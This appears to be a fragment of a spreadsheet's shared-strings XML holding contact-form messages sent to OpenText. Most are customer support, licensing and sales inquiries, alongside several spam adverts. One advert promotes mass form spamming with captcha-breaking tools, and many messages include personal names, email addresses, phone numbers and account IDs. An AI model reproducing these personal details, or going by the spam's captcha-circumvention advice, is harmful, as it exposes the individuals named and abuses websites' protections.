  </si>
  <si>
    <t>Good day._x000D_
We are interested in the opportunity, price and terms of delivery to the Republic of Belarus Guidance Software EnCase Forensic Studio in quantity 10 units._x000D_
Is it possible?</t>
  </si>
  <si>
    <t>Dears, I am trying to create an account as a developer to make a local installation from your software and make some tests with our product, the Layer2 Cloud Connector. Every time I try to create an account, I get an error "Could not create account". How should I proceed? Thanks for your help! Best regards.</t>
  </si>
  <si>
    <t>We are looking for AI for predicting factory maintenance.</t>
  </si>
  <si>
    <t>Hallo liebe Menschen von opentext,_x000D_
_x000D_
ich möchte über diesen Weg erfragen, warum ich ihre Webseite noch nicht per IPv6 erreichbar ist._x000D_
_x000D_
Ebenfalls ist mir aufgefallen, dass ihr MX noch SSLv3 anbietet, ist dieses wirklich so gewünscht?_x000D_
_x000D_
Mit besten Grüßen_x000D_
Sebastian van de Meer</t>
  </si>
  <si>
    <t>We pleasure to introduce our self for disposal of your old &amp; obsolete electronic assets (E Waste).we are authorized to collect E Waste from PAN India location._x000D_
We carry to ensure safe disposition of the e-waste within the government of India guidelines while adhering to “Pollution Control Board” and “ISO” standards._x000D_
Requesting you to kindly share your list of disposal assets (E Waste) enables us to provide you our best prices._x000D_
Apart from e waste we also procure the obsolete/End of life material from OEMs for refurbished the same and sell into B2B._x000D_
Looking forward to a favorable response…….!</t>
  </si>
  <si>
    <t>train me i need to be a part of this</t>
  </si>
  <si>
    <t>FI</t>
  </si>
  <si>
    <t>Not authorized to download OpenText Application Governance &amp; Archiving for Microsoft SharePoint 2019.exe (5.8 MB). Account: Suomen Pankki (Bank of Finland) End user code: EU0156850</t>
  </si>
  <si>
    <t>We have a couple of Tableau T6u SAS bridges (serial number of one of them is 02069108)  I have been required to image the following two models of HDD:_x000D_
Seagate Savvio ST9300653SS_x000D_
IBM 00ND135_x000D_
_x000D_
Neither device are recognised by either of the T6U's (updated firmware both) that we have._x000D_
Both the drives are SAS v2, can you confirm if the T6U supports SAS v2.</t>
  </si>
  <si>
    <t>Query our licence renewals for OpenText Document Access for SAP, we have been renewing licences via EOH SAP Services and also SAP South Africa and would like to consolidate these into a single invoice as we have been instructed to distance our company from dealing with EOH. Can you advise how we can consolidate these</t>
  </si>
  <si>
    <t>Hi Team_x000D_
We are using VIM in connection with SAP system and so far we encountered one specific situation that we need an advice..._x000D_
One user has discovered, that VIM invoices approved by a former employee (that is no longer within a company), who had the same Username and Email address, are available in his VIM approve portal. These historic invoices approved back in 2013 by that former employee that are visible in the HISTORY view of VIM for current user._x000D_
_x000D_
This might be a serious security breach if this is possible in general. Please advice what we can do to avoid this_x000D_
_x000D_
Thanks and regards_x000D_
Ivan</t>
  </si>
  <si>
    <t>CN</t>
  </si>
  <si>
    <t>AU</t>
  </si>
  <si>
    <t>NSW</t>
  </si>
  <si>
    <t>Hi OT Team,_x000D_
We've recently implemented SAP with VIM. I'm after any user guides or libraries that can help us as we move forward with VIM._x000D_
_x000D_
Could you send me or point me in the direction of any documentation you have available?_x000D_
_x000D_
Many thanks,_x000D_
_x000D_
Adam</t>
  </si>
  <si>
    <t>Hi, i try to access the website using my login ID to download the activation keys, it keeps showing me "no access" Please help. Thank you</t>
  </si>
  <si>
    <t>NZ</t>
  </si>
  <si>
    <t>Where do I login to download the new versions of Encase Forensic?_x000D_
_x000D_
Your website seems to be facing some issues in terms of connectivity.</t>
  </si>
  <si>
    <t>Do you have pricing for your Sentiment Analysis software program. We need one seat.</t>
  </si>
  <si>
    <t>MK</t>
  </si>
  <si>
    <t>We offer you the opportunity to advertise your products and services. _x000D_
 _x000D_
Hello! Please note nice offer for you. I can send your commercial offers or messages through feedback forms. The advantage of this method is that the messages sent through the feedback forms are included in the white list. This method increases the chance that your message will be read. Mailing is made in the same way as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April 7.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Best wishes _x000D_
 _x000D_
This message is created automatically use our contacts for communication.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
     I'm e-mailing to see if I can request someone on our support team to help run a report.  I'm looking to generate a report that can display a list of (all) documents and their location.  There are several hundred (thousand?) documents in our system._x000D_
_x000D_
Happy to jump on a call, thanks!_x000D_
_x000D_
- Elvin Rey Magsino</t>
  </si>
  <si>
    <t>We are implementing EPIC in our clinics. Looking at vendors in the space for inbound and outbound faxing.</t>
  </si>
  <si>
    <t>MO</t>
  </si>
  <si>
    <t>I am new with Par Electric and I need to get in touch with our sales rep.  Our current invoice shows that it is Kelly Lynch.</t>
  </si>
  <si>
    <t>We have recently started upgrading to Windows 10 and when we try and install RightFax we are receiving the following error message. "Failed to create FaxCtrl printer. RFMSIAdd2 returned 1792." It seems like the utility installs and the systems tray installs, but it does not install the RighFax printer.</t>
  </si>
  <si>
    <t>SV</t>
  </si>
  <si>
    <t>Hello. We used to be a partner from the former Cardiff/Verity Teleform platform in the early 2000's as Moore de Centroamerica before Rrd bought Moore. We have a customer that is interested in acquiring the software to scan/capture data and a DMS. Please feel free to contact me.</t>
  </si>
  <si>
    <t>GF</t>
  </si>
  <si>
    <t>Здравствуйте! Хочу предложить вам продвижение вашего сайта в поисковиках, методом наращивания ссылок. Чем больше ссылок будут ссылаться на ваш сайт, тем выше он будет в выдаче по вашим ключевым запросам. Для работы мне необходимо лишь ссылка на ваш сайт и ключевые слова, по которым вы продвигаетесь в поисковых системах. Если у вас установлена метрика, тем лучше, можно взять (скачать) оттуда ключи за последний месяц или квартал. _x000D_
 _x000D_
Работа занимает примерно 2-3 недели, после которой вы получите рост позиций, доверие поисковиков, увеличение траста вашего сайта, посещаемость, более 1000 ссылок на ваш сайт с различных ресурсов. _x000D_
 _x000D_
Стоимость – 9900 рублей. _x000D_
 _x000D_
Заинтересовались? Пишите на Email: proxrum*@*mail.ru (уберите звездочки *). Подробнее обсудим. _x000D_
 _x000D_
С Уважением к вам, Вадим.</t>
  </si>
  <si>
    <t>MN</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I'm new to the Encase team at Best Buy, and I need to get access to the support portal. We weren't able to fill out the form because we're not sure what to put in for some of the fields. Thanks.</t>
  </si>
  <si>
    <t>I want to take an online course</t>
  </si>
  <si>
    <t>Unable to reset password to apply for a job opening</t>
  </si>
  <si>
    <t>I am interested in receiving full case manager training for Axcelerate 5. Please advise if you can provide this training. _x000D_
_x000D_
Thank You</t>
  </si>
  <si>
    <t>PA</t>
  </si>
  <si>
    <t>We had to change a domain controller on our network.  Now our Rightfax Express will not let us log in.  I do not have the appliance password.  On the front it has a sticker:  SBHM-RF_x000D_
I need to get on and configure for the new domain controller so we can log in to the device.</t>
  </si>
  <si>
    <t>I would like to get pricing on a pdf comparing package.</t>
  </si>
  <si>
    <t>KW</t>
  </si>
  <si>
    <t>Unable to access Support services to log a case. Kindly check if active support contract exists.</t>
  </si>
  <si>
    <t>Conducting Market Research looking for Records Management solutions and pricing list.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there,_x000D_
_x000D_
The Canadian flag on top of your Rideau Street office location is damaged and needs to be replaced. It appears that it is torn on the bottom rung. _x000D_
Please replace the flag. </t>
  </si>
  <si>
    <t>hi,_x000D_
I is possible run edocs 5.3.1. patch 6 on windows 10, office 2010? It is work till now,but we have problem with dm extension in office 2010. add-in is still switching off._x000D_
 Thanks in advanced_x000D_
Best regards!_x000D_
Berec</t>
  </si>
  <si>
    <t xml:space="preserve">Support on being able to group mailboxes by trading partner and being able to send the data to multiple emails. </t>
  </si>
  <si>
    <t>Seeking contact to review assortment of Pet (Dog and Cat) items to include Toys, Bedding, Carriers, Travel and Treats. Currently #1 in multiple categories per recent IRI data with Brands for each channel.</t>
  </si>
  <si>
    <t>IT</t>
  </si>
  <si>
    <t xml:space="preserve">I was informed that OpenText bought GXS and I was to ask you about an error we are having._x000D_
Desktop EDI has an error on open._x000D_
_x000D_
 Internal Error: The system could not locate the library file EdDcLgSv.DLL: _x000D_
Operating System Error: Class not registered _x000D_
_x000D_
This file may either be present and not properly registered with the operating system or may missing. Try re-installing the application if the problem persists._x000D_
 </t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for a solution to capture information from a PDF/JPEG file and generate a CSV file to be processed for an internal platform._x000D_
_x000D_
Would you have a solution for this requirement?_x000D_
_x000D_
Thanks </t>
  </si>
  <si>
    <t>looking to do a certification in documentum, OpenText Certified Documentum Consultant Exam_x000D_
_x000D_
kindly call me to the given number and share me the study materials to prepare the exam._x000D_
am looking to do this certification in 2 weeks, kindly share all the details.</t>
  </si>
  <si>
    <t>I'm hoping to get in touch with the person in charge of the Partner Program to discuss an a partnership opportunity with SUSE</t>
  </si>
  <si>
    <t>MA</t>
  </si>
  <si>
    <t xml:space="preserve">Can ACTUATE 11 SP4 work on Windows 10 machines? </t>
  </si>
  <si>
    <t>I have a new employee who needs a fax to email set up.  Our account number is 82043 and I am with Stackpole Electronics, Inc.  Could someone please help to set this up?</t>
  </si>
  <si>
    <t>BUENOS DIAS, LLEVAMOS DIAS DE HABER ADQUIRIDO EL SOFTWARE ENCASE, Y AL INTENTAR REGISTRAR LA LICENCIA DEL DONGLE, EN LA PAGINA DE OPENTEXT, EN MYSUPPORT, ME SALE EL MENSAJE DE "NO ACCESS", NO PUDIENDO REGISTRAR HASTA EL DIA DE HOY LA LICENCIA QUE ADQUIRIMOS</t>
  </si>
  <si>
    <t>Hi there!_x000D_
 _x000D_
I am sure your inbox is brimming with conference participation requests so I will only take a moment of your time to demonstrate why your organization needs to be at IAITAM ACE 2019._x000D_
 _x000D_
If you feel this should be in someone else’s inbox, please pass along._x000D_
 _x000D_
Key Event Information:_x000D_
•	The world’s largest conference solely dedicated to the IT Asset Management (ITAM) industry_x000D_
•	Taking place May 22-24 at Marriott Marquis San Diego Marina in sunny San Diego, California_x000D_
•	Fulfills the needs of ITAM professionals with educational lectures, workshops, service and product demonstrations and the most targeted networking our industry offers_x000D_
 _x000D_
What Sets Us Apart?_x000D_
•	IAITAM is the ITAM industry’s global leader in education and membership with a reach spanning over 126 countries_x000D_
•	Targeted audience: quality attendees = quality leads_x000D_
•	Our event is strategically structured to provide maximum knowledge sharing and networking opportunities between all participants_x000D_
•	Booth attendees have full access: we want you to benefit from the knowledge sharing and non-exhibition networking this conference provides so plan on participating from Kick-off through Closing_x000D_
•	We know how to make learning fun and exciting! Check out past events on Facebook _x000D_
 _x000D_
IAITAM’s audience is comprised of professionals at every level, from every industry and from all over the world. In 2018, IAITAM hosted over 1,500 attendees from the IT Asset Management arena, bringing together the knowledge and networking our industry demands. _x000D_
 _x000D_
Audience Demographic:_x000D_
  _x000D_
How can you get involved?_x000D_
Join us in San Diego! Whether sponsoring, exhibiting or simply attending, IAITAM ACE 2019 is the place for you and your organization to network and strategize with key decision makers and industry peers. _x000D_
 _x000D_
Over 70% of our sponsors return each year – they know the value in IAITAM ACE sponsorship, do you?</t>
  </si>
  <si>
    <t>We are interested in Document Management Software Documentum as at the moment everything is tracked via spreadsheets. We have about 100 purchase orders open at any one time creating on average 50 documents per PO. We would like everything in a database with easy to produce overdue reports, project status reports, automated transmittals, access to the database for all project managers in various locations.</t>
  </si>
  <si>
    <t>I came across this site while looking for innovative ways to conduct records management for our center located at Patrick AFB. We were tasked to find a program or system that could create, manage, and archive records in accordance with NARA rules and regulations. Being a military rounded center, we would also need security over our records. We were wondering if your system was something we could possibly use and what the price of it would be. Also, if you could give us any extra information on how it works and how others have incorporated it, would be appreciated.</t>
  </si>
  <si>
    <t>I am a current hightail client.  I understand you've acquired hightail.  I'm trying to log into my hightail account and being instructed to enter credit card info, but my prior annual contract doesn't expire until July of 2019, so why am I being prompted to enter updated credit card info now?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I am inquiring about your authorized resellers of Documentum Enhanced Maintenance &amp; Support. We are needing to renew our maintenance and support contract for, Business Activity Monitor Multi-Core, Content Trans Services Documents, DCTM xCP User Unlimited Apps, and Kazeon/DocSci/Leap Protect Anytime. Maintenance Contract No. 62549344D. Are these maintenance and support services available on GSA or NASA SEWP? You assistance in our market research is appreciated. Thank you Hugo </t>
  </si>
  <si>
    <t xml:space="preserve">I need to pay for a renewal with credit card- Period of performance 6/1/19 - 5/31/20. Reference RC419021. </t>
  </si>
  <si>
    <t>I understand you offer EDI connection to Sage. I was wondering if you offer this for Sage Business Cloud Accounting instead of 50 or 200?</t>
  </si>
  <si>
    <t>IE</t>
  </si>
  <si>
    <t>Hi, my company is a customer of the Actuate platform. Our Open Text account manager, Bill Maloomian, is no longer with Open Text and I am looking for a contact name to help me._x000D_
_x000D_
Regards,_x000D_
Aidan</t>
  </si>
  <si>
    <t>I am looking for a solution to provide a single bank disbursement file that can be provided to OpenText and your service can provide each bank with the appropriate format for each bank.</t>
  </si>
  <si>
    <t>MI</t>
  </si>
  <si>
    <t>My access was removed from the portal and app central.  I'm unable to get to anything nor renew my EnCE membership.  I did a password reset but can't access any pages when i login.  Please let me know when my request can be resolved.  user name: plubas@ford.com</t>
  </si>
  <si>
    <t>QC</t>
  </si>
  <si>
    <t>Hi I have installed Documentum 7.1, we have a request to create a soap client for a customer, bit I noticed the 7.1 image does not install or contain DFS is there a way i can get the DFS package to look at integration?</t>
  </si>
  <si>
    <t>I would like to have access to the Knowledge Base.</t>
  </si>
  <si>
    <t>SA</t>
  </si>
  <si>
    <t xml:space="preserve">We need to know the process of integrating Open text with our existing Oracle ERP. </t>
  </si>
  <si>
    <t>Hi, I am a reseller in India. One of my client is looking below product-Open text image view – permanent software. qty.-1. Pleade share the reseller and endcustomer price.</t>
  </si>
  <si>
    <t>Dears,_x000D_
We have deployed StreamServ by Ericsson as part of our BSS stacks upgrade. We currently use it to produce Customer monthly invoice for both segment (consumer &amp; Corporate). We would like someone from OpenText to review the customization and deployment and make sure they are optimal or need optimization and enhancement. Appreciate your feedback.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I am unable to access My Support and Knowledge Base sites._x000D_
Can you please grant the access on that._x000D_
Thnak you</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
 _x000D_
I don’t mean to bombard you with emails however any thoughts on my request?_x000D_
_x000D_
Regards,_x000D_
Alex_x000D_
</t>
  </si>
  <si>
    <t>Inquiry on training for encase forensic _x000D_
Do you have online training and what is the cost? _x000D_
What will be the cost of providing the course in Lagos, Nigeria for a minimum of 5.</t>
  </si>
  <si>
    <t>How i can test document software?_x000D_
Do u have any trial or demo for testing?</t>
  </si>
  <si>
    <t>I would like to update our partner listing in the partner directory but cannot seem to find a place to update it. _x000D_
_x000D_
I would like to change our address from ‘s Gravelandseweg 59, 1217 EH to ‘s Gravelandseweg 178. 1217 GB. If it is also possible I would like to see the region changed to Global instead of listing various different regions. Or at least EMEA and NA.</t>
  </si>
  <si>
    <t>Hello Sales,_x000D_
_x000D_
 My name is David Ramsey . I\'m the General Manager of David&amp;Sons Distributors  am glad to introduce ourselves as a retail store in Belize, i will like to  purchase some products in your company or store for my business._x000D_
_x000D_
-Do you allow pick up via Courier Company or freight forwarders?_x000D_
-Do you accept master and visa credit card for instant payments?_x000D_
-Can you send me your wholesale price sheet or website to view your products ?_x000D_
_x000D_
Awaiting your response._x000D_
_x000D_
Sincere,_x000D_
David Ramsey {MD}_x000D_
David&amp;Sons Distributors _x000D_
47Z Sandased Drive,Belize City_x000D_
Belize City, Belize Central America._x000D_
Telephone Number: +16268382709_x000D_
daviddistributors01@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">Sir I need to develop this in India </t>
  </si>
  <si>
    <t xml:space="preserve">Sir we can start up company over India this was I am trying to develop now I need ur support bcoz as u guys know how India is in marketing </t>
  </si>
  <si>
    <t>Hello_x000D_
We bought your product 5 years ago_x000D_
_x000D_
Now I have a problem with the Right fax server_x000D_
_x000D_
There is a problem with the license_x000D_
We got this message when we change the virtual machine in a hyper-v cluster._x000D_
And your product doesnt work anymore._x000D_
_x000D_
This software has been previously activated on a different server, please contact a Technical Support Agent at +1 520.320.7070 to proceed with activation process._x000D_
_x000D_
can you help me?_x000D_
Best Regards_x000D_
santos@cartv.es</t>
  </si>
  <si>
    <t>I am looking for a contact person from Finland who can help Liaison`s supplier web portal and EDI related matters. _x000D_
_x000D_
Thank you in advance</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
We have 1472  Ready-To-Buy SAP Hybris Software Technology Customers List from UK._x000D_
_x000D_
Test file will be given to review and check quality._x000D_
_x000D_
Do you want to see the test file? _x000D_
_x000D_
Thank You,_x000D_
Regards,_x000D_
_x000D_
Alisha Vasquez_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I try to reset my password, but it fails with the massage: An error occurred updating password. _x000D_
I need this to update our dongle with the new Encase license.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Sir,_x000D_
This is Sharon from Reliable Mould company sincerely writing here ,a professional injection mould ; Die casting ; CNC machining and 3D Printing factory located in Guangdong._x000D_
_x000D_
50% Lower cost _x000D_
200% better quality _x000D_
Fast delivery _x000D_
Perfect service _x000D_
_x000D_
Pls kindly send RFQ details for better pricing if  any enquiries._x000D_
_x000D_
Thanks so much and sorry for bothering if any ._x000D_
_x000D_
Yours sincerely_x000D_
Sharon_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I cannot confirm my registration._x000D_
Wenn I sign In to confirm my registration, a server error encounter during the process.</t>
  </si>
  <si>
    <t>We are seeing crashes caused by IRM Client 5.1.2018_x000D_
Our environment includes Adobe Reader Classic 17.011.30127 and Adobe Acrobat Pro/Std 2017._x000D_
We have seen crashes can be caused when printing PDFs or when opening PDFs via file explorer._x000D_
_x000D_
I dont have any documentation about this product and little knowledge about what it does._x000D_
I would appreciate some assistance.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We are authorised reseller for software tools in India.  One of our customer is in need of your software_x000D_
_x000D_
Product Name: Open text image view – permanent software_x000D_
Qty: 01_x000D_
_x000D_
_x000D_
Request you to kindly share reseller discounted price at the earliest._x000D_
_x000D_
Regards,_x000D_
Priya_x000D_
Preflex Solutions Pvt Ltd_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We need a Chinese speaker sales &amp; IT support. A good business chance!</t>
  </si>
  <si>
    <t>Dear Team,_x000D_
Greetings of the day!!_x000D_
We nee the price for the product given below-_x000D_
Open text image view-Permanent  Software_x000D_
Qty-1._x000D_
Looking forward to hear from you._x000D_
Regards_x000D_
Neha _x000D_
9582201966_x000D_
Acpl System Pvt Ltd</t>
  </si>
  <si>
    <t>I'm not getting any response from Saudi Sales team. This is really bad.</t>
  </si>
  <si>
    <t>BF</t>
  </si>
  <si>
    <t>We offer you the opportunity to advertise your products and services. _x000D_
 _x000D_
Good day! Look at an interesting offer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April 7.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Thank you for your attention. _x000D_
 _x000D_
This message is created automatically use our contacts for communication.</t>
  </si>
  <si>
    <t>AR</t>
  </si>
  <si>
    <t>We offer you the opportunity to advertise your products and services. _x000D_
 _x000D_
Hi! Here is  an important offering for you. I can help you with sending  your commercial offers or messages through feedback forms. The advantage of this method is that the messages sent through the feedback forms are included in the white list. This method increases the chance that your message will be read. The same way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April 7.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Sorry to bother you. _x000D_
 _x000D_
This message is created automatically use our contacts for communication.</t>
  </si>
  <si>
    <t>I am unable to opentext sites and upon entering my credentials , I get access denied message. Please help</t>
  </si>
  <si>
    <t>what is the process to get access to software downloads for my customer - Centurylink?  I have an account but it's not associated with CTL yet?  Does the onsite admin have to do that?</t>
  </si>
  <si>
    <t>AS</t>
  </si>
  <si>
    <t>Good day, crypto community! _x000D_
 _x000D_
Unique database of crypto industry sources. _x000D_
Crypto sources base contains 350,000 targeted URL records of cryptocurrency, blockchain, ICO/ITO/STO, fintech and related sources. _x000D_
 _x000D_
It's applicable for contact form submission, ads posting, link building creation. _x000D_
The best results are achieved using the following automated ads posting software: _x000D_
- GSA Website Contact, GSA Search Engine Ranker, GSA Auto Website Submitter; _x000D_
- Xrumer 18. _x000D_
 _x000D_
Our base is the best solution to attract targeted crypto audience. _x000D_
 _x000D_
We highly recommend to use internal software addon for captcha breaking _x000D_
or use external captcha solving services: antiCaptha,  2captcha, antigate, etc... _x000D_
 _x000D_
25000+ keywords were used while scraping search engines results. _x000D_
 _x000D_
- De-duplicated URLS, so you get the most UNIQUE DOMAINS possible. _x000D_
- New verified links added on the WEEKLY! _x000D_
- Dropbox AUTO-SYNC for a fresh, blockchain site list  24/7. _x000D_
- Websites with Google Recaptcha v2 security protection included. _x000D_
- CLEANED up every week to remove dead, no longer working, timedout sites. _x000D_
- Database created using OCR captcha solving software (GSA Captcha Breaker and XEvil). _x000D_
 _x000D_
Quit wasting time trying to find websites which allow you to make a post. _x000D_
Enjoy this high-quality verified list made specifically to promote ICOs, Startups and other crypto related businesses. _x000D_
 _x000D_
You will receive the COMPLETE verified URLs list for ONLY $59 at once! (Regular price is $300). _x000D_
 _x000D_
We accept Payoneer, Qiwi, BTC/ETH payments. _x000D_
 _x000D_
After payment you will receive an email invite to a Dropbox folder where verified list can be found. _x000D_
The invite link will be sent to your e-mail address. _x000D_
 _x000D_
mail us: _x000D_
cryptoleads-cryptoworld@yahoo.com _x000D_
 _x000D_
telegram: @hot_leads _x000D_
 _x000D_
#tags, keywords: ICO, blockchain, crypto industry, ICO advisory, ICO airdrop, ICO bounty program _x000D_
 _x000D_
bitcoin what is pool hopping_x000D_
ripple cryptocurrency news_x000D_
cryptocurrency key terms_x000D_
bitcoin mining gpu chart_x000D_
bitco</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, we are currently assessing options for our fax requirements. We are an optometry chain, and require each of our practices to have access to fax capabilities via our server on AWS. We would like them to be able to 'print to fax'. We have 40 practices in Australia and 8 in New Zealand, so need outgoing fax for all of them, but only 1 incoming fax number for each geography. Volume is low, so probably only 2 concurrent lines is fine. _x000D_
_x000D_
Can you please provide some information about costs for your software. Also do you have a recommended SIP provider in Australia that works well with RightFax? _x000D_
_x000D_
Thanks_x000D_
Peter_x000D_
</t>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t xml:space="preserve">We can't activate product, can you please help_x000D_
</t>
  </si>
  <si>
    <t>BM</t>
  </si>
  <si>
    <t>RI</t>
  </si>
  <si>
    <t>We offer you the opportunity to advertise your products and services. _x000D_
 _x000D_
Dear Sir / Madam Here is  an interesting offer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Mailing is made in the same way as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April 7.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Best wishes _x000D_
 _x000D_
This message is created automatically use our contacts for communication.</t>
  </si>
  <si>
    <t>VIC</t>
  </si>
  <si>
    <t>We use Rightfax and are currently updating our Fuji printer software to AWMS.  I have been advised from Fuji that we need a new Rightfax connector to work with AWMS.  Can you please advise how we obtain this.</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning.  I recently applied on line for the Director Taxation, APAC position in the Sydney office and I wanted to speak to someone about the role.  Could someone please contact me?  My mobile number is +61 409325378_x000D_
Thanks and regards_x000D_
Michael Powell </t>
  </si>
  <si>
    <t>I've got a new Tableau T356789iu Forensic Bridge from Digital Intelligence and upon pressing the power button the power light just continually flashes green.  Tried powering the machine completely down and cutting power, then bringing back up.  Didn't help.</t>
  </si>
  <si>
    <t>Please change primary contact from aron campbell to Shivam Srivastava. Also add secondary contact - Cindy Ho</t>
  </si>
  <si>
    <t xml:space="preserve">Please email me to discuss further. I am interested in learning about invoice recognition capabilities. </t>
  </si>
  <si>
    <t>Tienen representantes en Perú? Do you have representatives in Peru?_x000D_
Información de Soporte a Documentum. Documentum Support Information:_x000D_
Server Version : 7.0.0050.0544 Win64.SQLServer _x000D_
Webtop 6.7</t>
  </si>
  <si>
    <t>I'm trying to find the mediabin Client for windows, I am using via a Virtual Machine on a Mac and cannot find a direct link to download the Desktop client.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Hope you are doing well. I just wanted to know if i could send some great article ideas for a guest post on your website._x000D_
_x000D_
If you like the ideas i put forward, i will provide you with high-quality free content/articles. In exchange, all i expect is a back link from within the main body of the article._x000D_
_x000D_
Do let me know if you like this proposal and if i can begin sending you some topic ideas._x000D_
_x000D_
Best Regards_x000D_
_x000D_
Ashlie Lopez</t>
  </si>
  <si>
    <t>BO</t>
  </si>
  <si>
    <t>NH</t>
  </si>
  <si>
    <t>We offer you the opportunity to advertise your products and services. _x000D_
 _x000D_
Good man! There is an interesting offers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The same way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April 7.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Hope to hear from you soon. _x000D_
 _x000D_
This message is created automatically use our contacts for communication.</t>
  </si>
  <si>
    <t>I am working on some projects from an old ERP system from Informal that used Gupta report viewer.  It appears as if you have acquired Gupta technologies and I was wondering if you have a report builder that would allow me to see the data sources used by the existing reports in the system.</t>
  </si>
  <si>
    <t>How to monitor Throttling queue for files being sent out or not being sent out?</t>
  </si>
  <si>
    <t>Send any inside sales opportunities that you have to me. I prefer the REMOTE ( working from home type ) of opportunities. Thanks,</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
1) I need access to your support forums/knowledge base_x000D_
2) We are using Gupta Team Developer 6.3.9 on Windows 7 and 10 and our customers cannot print multiple copies of qrp-based report collated. Pages are supposed to come in order:_x000D_
_x000D_
Copy#1 Page#1_x000D_
Copy#1 Page#2_x000D_
Copy#2 Page#1_x000D_
Copy#2 Page#2_x000D_
_x000D_
Instead they are coming in order _x000D_
_x000D_
Copy#1 Page#1_x000D_
Copy#2 Page#1_x000D_
Copy#1 Page#2_x000D_
Copy#2 Page#2_x000D_
_x000D_
no matter what settings are used. This is confirmed to be working properly in CTD 4.2.0 that we used up-to-date. I have simple example that demonstrates it that does not require DB connection. I can send it to you in zip file._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I have created an account and I have been sent a confirmation email but still cannot access tickets and create them etc. Please help._x000D_
</t>
  </si>
  <si>
    <t>UT</t>
  </si>
  <si>
    <t>Customer ID: EU0092091_x000D_
License ID: V0336-19000_x000D_
_x000D_
I am attempting to download the newest version of OpenText due to an older version possibly being classified as a critical vulnerability on our networks.  A recent security scan has shown X11 needing to be restricted.  I am not sure if a new version of the software will remove the vulnerability, or if we can just restrict its access by disabling TCP.  We are open to options, but need to remediate this.</t>
  </si>
  <si>
    <t>PH</t>
  </si>
  <si>
    <t>Hello Team i need help verify the status of the list of system ids we have. WE need to know when these system ids. Looking forward to hearing from you asap _x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>We have a trading partner who is requesting us to have an SHA256 certificate but we are currently using an MD5 certificate. My question is: Does TrustedLink System I have the ability to support two different certificates at one time and if so, would we need a new unique name and EDI ID?</t>
  </si>
  <si>
    <t xml:space="preserve">How can I determine if OpenText/EasyLink fax numbers can be ported to another provider?  We currently use a couple fax providers and would like to port a few of the OpenText numbers to one of the other providers we use.  Does OpenText allow numbers to be ported out?  If so, is there a price per line?  </t>
  </si>
  <si>
    <t>We currently use Alchemy Gold, version 8.3. We want to find out what your current Alchemy packages are, how they are licensed and their pricing. How well are they supported when it comes to general document management since you only discuss it as an adjunct to RightFax on your web site?</t>
  </si>
  <si>
    <t>EC</t>
  </si>
  <si>
    <t>Hello, we want to buy Alchemy Licences, please contact us</t>
  </si>
  <si>
    <t>MX</t>
  </si>
  <si>
    <t>Hello, this is the second ticket I have opened at Covisint support with the same issue but it is still not solved. They requested me to contact you. This is related to GMSP portal.    I am the CSA for my organization (KUOADMIN and I have granted my user ROBINRWRIGHT Access to Partlink application, and their belonging roles and as well as GQTS app. User still can not Access and he really needs this Access. Please help. This is what he is getting: You are not authorized to use partlink application. I really do not know what else to do.  Please advise.</t>
  </si>
  <si>
    <t>if our client procured licenses for DM Content Server and Brava1 Enterprise Viewer, can they host these in an Azure cloud data center in USA? Are there are restrictions? Please advise.</t>
  </si>
  <si>
    <t>CT</t>
  </si>
  <si>
    <t>I can't get a successful registration for Gupta Report Builder Test Drive.  We got it with Infor Visual &amp; I'm trying to update a report because we moved from Somers, CT to Enfield, CT.  I'm trying to run RepBi52.exe.</t>
  </si>
  <si>
    <t>Can someone please contact me regarding Infuse 2019? I have tried to call and was sent into automated systems twice._x000D_
_x000D_
Kindest,_x000D_
Amanda</t>
  </si>
  <si>
    <t>Can you tell me what the latest version of Enterprise Scan is?</t>
  </si>
  <si>
    <t>Hello - Can you please provide instructions for uninstalling the EnCase agent on a Windows system?_x000D_
_x000D_
Thanks,_x000D_
Shawn</t>
  </si>
  <si>
    <t>I cannot log into my account to access my efax.  fax number is 615-866-3470</t>
  </si>
  <si>
    <t>I need to update my billing info and have been trying to get a hold of ANYONE who would help. I have tried several times to talk to someone in your billing department and can't even leave a message anymore....I did leave several messages weeks ago and no one has called back. I have also emailed you and got no response either!...DO YOU WANT TO BE PAID OR NOT???</t>
  </si>
  <si>
    <t>Hi, _x000D_
Can you please provide me all ports that need to be open for the eDOCS 16.X software? Database, Webserver, and AppServer ports should be put into consideration for this answer._x000D_
Thanks,_x000D_
Tim</t>
  </si>
  <si>
    <t>GA</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I would like to know if there is a forum dedicated to Documentum. Also, if there is any additional information that you could provide about Documentum that would be great_x000D_
</t>
  </si>
  <si>
    <t>I need a purchase quote for 2x Annual Passport Training, and a good POC for my purchasing contract supervisors to work with to make the purchase happen.  Thank you.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I'd like to request access to knowledge base._x000D_
_x000D_
Thank you._x000D_
_x000D_
Naveen</t>
  </si>
  <si>
    <t>I'm trying to get a copy of the free tool EnCase Forensic Imager. Is that no longer available? The Guidance Software site directs me to Open Text but I don't see any download options.</t>
  </si>
  <si>
    <t>I'm looking into your solution on behalf of my client.  They are 100% cloud based and would like to send and receive faxes digitally and integrate with their Electronic medical records system through direct messaging.  In addition they would like to receive traditional faxes and process them so they can also be uploaded into their EMR.  They would like to scan all regular mail convert it to digital mail and route to the appropriate recipient which could be a person (email), google drive folder or an application.  Thank you advance for your assistance</t>
  </si>
  <si>
